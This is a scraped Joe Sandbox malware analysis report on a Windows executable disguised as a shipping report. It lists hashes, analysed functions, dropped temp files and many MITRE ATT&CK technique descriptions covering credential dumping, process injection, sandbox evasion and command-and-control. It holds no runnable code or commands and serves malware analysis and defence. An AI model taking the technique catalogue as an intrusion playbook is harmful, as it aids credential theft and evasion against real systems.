Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 412a1b8ab7edf428c864f2ae51fd1aa117ad5494399ba585bc5b49dfd123d5f5
Instruction ID: 214861ce607670cc7bab3b11a6360e6029f77429ead790856de82ddd73724cdd
Opcode Fuzzy Hash: 412a1b8ab7edf428c864f2ae51fd1aa117ad5494399ba585bc5b49dfd123d5f5
Instruction Fuzzy Hash: A3D0A932380300BAE274A730DC0FFCA76049B04B00F004A027701AA1E0C9F0A8428A94

Function 000CBDFD Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 000CBE93
GetLastError.KERNEL32 ref: 000CBEA1
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 000CBEFC

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast
String ID:
API String ID: 1717984340-0
Opcode ID: 303c11dc3271a84c454fc777e0d8f45414651b029f9f14888a86dab44b760d45
Instruction ID: 96e04242155d3f6cb7ee35f177fbf0fd54427f47671adf0f9d11d4715ae622a5
Opcode Fuzzy Hash: 303c11dc3271a84c454fc777e0d8f45414651b029f9f14888a86dab44b760d45
Instruction Fuzzy Hash: AD41BF34604216ABDB318FA4CC46FBE7BE5AF41720F14416DF9599B2A2DB308D02CB60

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Shipping report#Cargo Handling.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\1m0Sa73J8

C:\Users\user\AppData\Local\Temp\finitism

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Windows Analysis Report
Shipping report#Cargo Handling.exe

Function 000942DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Function 000942A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Function 000D2BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Function 00092CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Function 000D065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Function 0009344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Function 00092B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Function 00093170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Function 03527A48 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Function 00092C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Function 03527818 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 146
fileCOMMON

Function 00093B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
registryCOMMON

Function 03526708 Relevance: 6.7, APIs: 4, Instructions: 720
processthreadCOMMON

Function 00093923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94
windowCOMMON

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre